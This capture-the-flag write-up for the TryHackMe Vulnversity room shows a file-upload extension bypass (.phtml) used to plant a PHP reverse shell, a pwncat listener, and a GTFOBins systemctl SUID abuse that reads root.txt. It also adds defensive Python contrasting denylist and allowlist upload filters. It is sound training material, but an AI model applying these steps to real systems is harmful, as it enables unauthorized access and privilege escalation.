TryHackMe - Vulnversity (Easy)
Author: ret2basic

Summary

Gobuster finds a hidden directory /internal which has an upload form. The upload form filters the .php extension, but Burp Intruder shows that .phtml bypasses the filter. We rename php-reverse-shell.php to php-reverse-shell.phtml, upload it, and get a www-data shell.
On the victim machine, /bin/systemctl is SUID. By adapting the GTFOBins systemctl payload into an arbitrary file read, we can read root.txt without obtaining a root shell.

IP

    RHOST: 10.10.64.243
    LHOST: 10.13.12.2

Nmap

Nmap

Gobuster

Run Gobuster against port 3333:

    $ gobuster dir -u http://10.10.64.243:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

Gobuster finds /internal:
Gobuster

www-data shell: File Upload with PHP Extension Bypass

There is an upload form in /internal:
/internal
Try uploading php-reverse-shell.php here. However, the file does not show up in the /internal/uploads directory afterwards:
Upload failed
Perhaps the .php file extension is blocked. Brute-force valid file extensions with Burp Suite Intruder. Remember to turn off "URL-encode these characters", otherwise the leading dot in each payload gets encoded:
Uncheck "URL-encode these characters"
Make a PHP extension wordlist:

    .php
    .php3
    .php4
    .php5
    .phtml

Intruder finds that the only valid extension is .phtml:
.phtml is a valid extension
Rename the PHP reverse shell payload to php-reverse-shell.phtml and upload again. This time the file is successfully uploaded:
Upload succeeds
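The bypass works because the form checks the extension against a denylist, so any executable extension missing from that list passes. As an added example (not part of this write-up or of the room), the Python below contrasts that kind of filter with an allowlist-based one and uses the same extension wordlist as a regression test; the denylist contents are an assumption chosen to reproduce what Intruder showed (everything rejected except .phtml).

```python
import os

# Assumed denylist: reproduces the behaviour observed with Intruder, where
# every extension in the wordlist is rejected except .phtml.
DENYLIST = {".php", ".php3", ".php4", ".php5"}

# Allowlist for a document upload form, plus the server-side executable
# extensions that must never pass even if the allowlist is extended later.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}
PHP_VARIANTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Extension wordlist from the write-up, reused here to regression-test a filter.
PAGE_WORDLIST = [".php", ".php3", ".php4", ".php5", ".phtml"]


def denylist_allows(filename: str) -> bool:
    """Vulnerable check: only the final extension is compared against a denylist."""
    _, ext = os.path.splitext(filename)
    return ext not in DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: every dotted segment after the stem must be allowlisted."""
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    # Require a non-empty stem and at least one non-empty extension
    # (this also rejects dotfiles such as .htaccess and trailing dots).
    if len(parts) < 2 or any(p == "" for p in parts):
        return False
    exts = {"." + p for p in parts[1:]}
    # Subset of the allowlist, and never one of the PHP variants.
    return exts <= ALLOWLIST and not (exts & PHP_VARIANTS)


def audit(check, extensions=PAGE_WORDLIST, stem="php-reverse-shell"):
    """Return the wordlist extensions that the given filter lets through."""
    return [ext for ext in extensions if check(stem + ext)]


if __name__ == "__main__":
    print("denylist lets through :", audit(denylist_allows))   # ['.phtml']
    print("allowlist lets through:", audit(allowlist_allows))  # []
```

Running the audit against your own filter before deployment catches exactly the gap the Intruder run found here.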
Start a pwncat listener:

    $ sudo pwncat :443

Trigger the reverse shell payload and get a user shell as www-data:
www-data shell

Arbitrary File Read: SUID /bin/systemctl

Search for SUID files:

    $ find / -perm -u=s -type f 2>/dev/null

Note that /bin/systemctl is SUID:
/bin/systemctl
GTFOBins has a privesc payload for systemctl. Change the ExecStart command in the payload to cat /root/root.txt > /tmp/output:

    $ TF=$(mktemp).service
    $ echo '[Service]
    Type=oneshot
    ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
    [Install]
    WantedBy=multi-user.target' > $TF
    $ /bin/systemctl link $TF
    $ /bin/systemctl enable --now $TF

Execute these commands line by line on the victim machine, then read /tmp/output to get the content of root.txt:
root.txt